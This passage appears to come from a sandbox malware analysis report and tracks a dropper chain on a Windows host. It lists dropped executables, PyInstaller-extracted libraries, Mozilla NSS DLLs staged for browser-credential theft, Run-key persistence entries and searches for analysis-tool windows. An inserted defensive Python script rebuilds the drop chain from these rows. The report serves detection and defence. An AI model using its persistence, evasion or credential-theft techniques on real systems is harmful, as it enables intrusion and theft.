Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\win32api.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography\hazmat\bindings\_rust.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\TempLFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10235930101\83f34278c7.exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-3.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\UD49QH6[1].exe
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pyd
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin\win32ui.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_elementtree.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\crypted.41[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\win32\win32trace.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235950101\d101bd5267.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_brotli.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingft.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\simplejson\_speedups.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dw[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mrwipre12[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\libffi-8.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\python311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\libcrypto-3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\trano1221[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140_1.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10019520101\dw.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32\pythoncom311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32\pywintypes311.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\ucrtbase.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\python3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\v7942[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235960101\718edcc992.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted.7[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
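The rows above are flattened table cells (writer process, created file) and the drop chain is only implicit in them. The script below is an added example, not part of the Joe Sandbox report or any of the listed malware: it parses a subset of those rows (copied from the list, embedded as constructed input in the run-together form the extracted page uses) back into a writer tree, walks from one PyInstaller artefact up to the original sample, and tags each created file by what its location implies. The tag names, the heuristics in classify(), and the choice of rows are this example's own.

```python
import ntpath
import re
from collections import defaultdict

# Constructed input: a subset of the "File created" rows copied from the list
# above, kept in the run-together form the extracted page uses.
REPORT_ROWS = r"""
Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeFile created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\python311.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
"""

# Accepts both the run-together form ("...exeFile created: ...") and a
# "Source: X | File created: Y" form; the trailing link label is optional.
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?)\s*\|?\s*File created:\s*(?P<dst>.+?)"
    r"\s*(?:Jump to dropped file)?\s*$"
)

# Mozilla NSS libraries; stealers stage them next to their own binary so they
# can call NSS to decrypt Firefox logins.json without Firefox being installed.
NSS_LIBS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll"}


def parse_rows(text):
    """Return (writer, created_path) pairs; lines that are not File-created rows are skipped."""
    matches = (ROW_RE.match(line) for line in text.splitlines())
    return [(m.group("src"), m.group("dst")) for m in matches if m]


def writer_index(pairs):
    """created_path -> writer, keyed case-insensitively (NTFS paths are case-preserving only)."""
    idx = {}
    for src, dst in pairs:
        idx.setdefault(dst.lower(), src)   # first writer wins
    return idx


def roots(pairs):
    """Writers that were not themselves dropped: the sample plus LOLBins like powershell.exe."""
    created = {dst.lower() for _, dst in pairs}
    return {src for src, _ in pairs if src.lower() not in created}


def drop_chain(pairs, path):
    """Basenames from the root process down to `path`, following writer links upward."""
    idx = writer_index(pairs)
    chain, seen = [path], {path.lower()}
    while chain[-1].lower() in idx:
        parent = idx[chain[-1].lower()]
        if parent.lower() in seen:         # a file overwriting itself would otherwise loop
            break
        chain.append(parent)
        seen.add(parent.lower())
    return [ntpath.basename(p) for p in reversed(chain)]


def classify(path):
    """Tag a created file by what its location implies (example heuristics, not Joe Sandbox's)."""
    low = path.lower()
    name = ntpath.basename(low)
    if "\\_mei" in low:
        return "pyinstaller-extract"        # _MEIxxxxx is the PyInstaller onefile temp dir
    if name in NSS_LIBS and low.startswith("c:\\programdata\\"):
        return "nss-firefox-decrypt"
    if "\\inetcache\\ie\\" in low:
        return "wininet-cache-copy"         # WinINet/urlmon cache copy of a downloaded payload
    if name.endswith(".exe"):
        return "dropped-executable"
    return "other"


def summarize(text):
    """Row count, root writers and a per-tag histogram for a block of report rows."""
    pairs = parse_rows(text)
    counts = defaultdict(int)
    for _, dst in pairs:
        counts[classify(dst)] += 1
    return {"rows": len(pairs), "roots": sorted(roots(pairs)), "tags": dict(counts)}


if __name__ == "__main__":
    pairs = parse_rows(REPORT_ROWS)
    print(" -> ".join(drop_chain(pairs, r"C:\Users\user\AppData\Local\Temp\_MEI78242\python311.dll")))
    for key, value in summarize(REPORT_ROWS).items():
        print(f"{key}: {value}")
```

Run against the full list above, the chain from the sample to the _MEI78242 directory reads M6gQuZPvgY.exe, rapes.exe, amnew.exe, futors.exe, trano1221.exe, which is the order an analyst needs when deciding which hashes to block first; a second root (powershell.exe) shows that part of the chain was downloaded by a script rather than dropped from an embedded resource.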

                                      Boot Survival

                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e933e9d51.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmdJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d101bd5267.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 718edcc992.exeJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0629403be8.exeJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
